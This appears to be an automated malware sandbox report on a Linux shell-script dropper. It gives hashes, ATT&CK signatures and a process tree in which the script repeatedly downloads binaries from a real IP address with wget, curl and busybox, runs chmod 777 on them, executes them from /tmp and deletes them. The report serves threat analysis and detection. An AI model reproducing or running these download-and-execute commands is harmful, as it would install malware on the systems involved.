Analysis
-
max time kernel
28s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
24/11/2024, 01:07
Static task
static1
Behavioral task
behavioral1
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
-
Size
10KB
-
MD5
26f371cd3359d8f6a45ccc544288c804
-
SHA1
35bd60ad220991f844f9862e522418bc05563390
-
SHA256
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce
-
SHA512
2729bf8db10105d916290630952e3067a9f8f09aa7ae41abbe4ba4b44d26b55872829cbe0a605d526abae197a6dafb93ee254f30ac20bf7ce04bea8b41cb3ef0
-
SSDEEP
192:k47/XwgW6ozLldOY4Z6zJnzLldOYZM7/Xwg+w:kN5zLlcY4Z6zJnzLlcY3w
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh1⤵PID:1515
-
/bin/rm/bin/rm bins.sh2⤵PID:1516
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Writes file to tmp directory
PID:1521
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1522
-
-
/bin/chmodchmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Executes dropped EXE
PID:1524
-
-
/bin/rmrm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1525
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:1526
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:1528
-
-
/bin/chmodchmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:1531
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1534
-
-
/bin/chmodchmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1537
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:1540
-
-
/bin/chmodchmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:1543
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:1546
-
-
/bin/chmodchmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:1549
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:1552
-
-
/bin/chmodchmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:1555
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:1558
-
-
/bin/chmodchmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT./Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:1561
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:1562
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:1564
-
-
/bin/chmodchmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:1567
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:1570
-
-
/bin/chmodchmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:1573
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:1576
-
-
/bin/chmodchmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:1579
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:1580
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:1582
-
-
/bin/chmodchmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:1585
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:1586
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:1588
-
-
/bin/chmodchmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:1591
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:1592
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:1594
-
-
/bin/chmodchmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:1597
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:1598
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:1600
-
-
/bin/chmodchmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:1603
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:1606
-
-
/bin/chmodchmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:1609
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:1610
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:1612
-
-
/bin/chmodchmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:1615
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:1618
-
-
/bin/chmodchmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT./Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:1621
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:1622
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:1624
-
-
/bin/chmodchmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:1627
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:1630
-
-
/bin/chmodchmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:1633
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:1636
-
-
/bin/chmodchmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:1639
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:1640
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:1642
-
-
/bin/chmodchmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:1645
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:1648
-
-
/bin/chmodchmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:1651
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:1654
-
-
/bin/chmodchmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:1657
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:1658
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Writes file to tmp directory
PID:1659
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:1660
-
-
/bin/chmodchmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Executes dropped EXE
PID:1662
-
-
/bin/rmrm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:1663
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:1664
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Writes file to tmp directory
PID:1665
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:1666
-
-
/bin/chmodchmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- File and Directory Permissions Modification
PID:1667
-
-
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Executes dropped EXE
PID:1668
-
-
/bin/rmrm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:1669
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:1670
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Writes file to tmp directory
PID:1671
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:1672
-
-
/bin/chmodchmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- File and Directory Permissions Modification
PID:1673
-
-
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Executes dropped EXE
PID:1674
-
-
/bin/rmrm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:1675
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1676
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Writes file to tmp directory
PID:1677
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1678
-
-
/bin/chmodchmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- File and Directory Permissions Modification
PID:1679
-
-
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Executes dropped EXE
PID:1680
-
-
/bin/rmrm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:1681
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1682
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Writes file to tmp directory
PID:1683
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1684
-
-
/bin/chmodchmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- File and Directory Permissions Modification
PID:1685
-
-
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Executes dropped EXE
PID:1686
-
-
/bin/rmrm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:1687
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97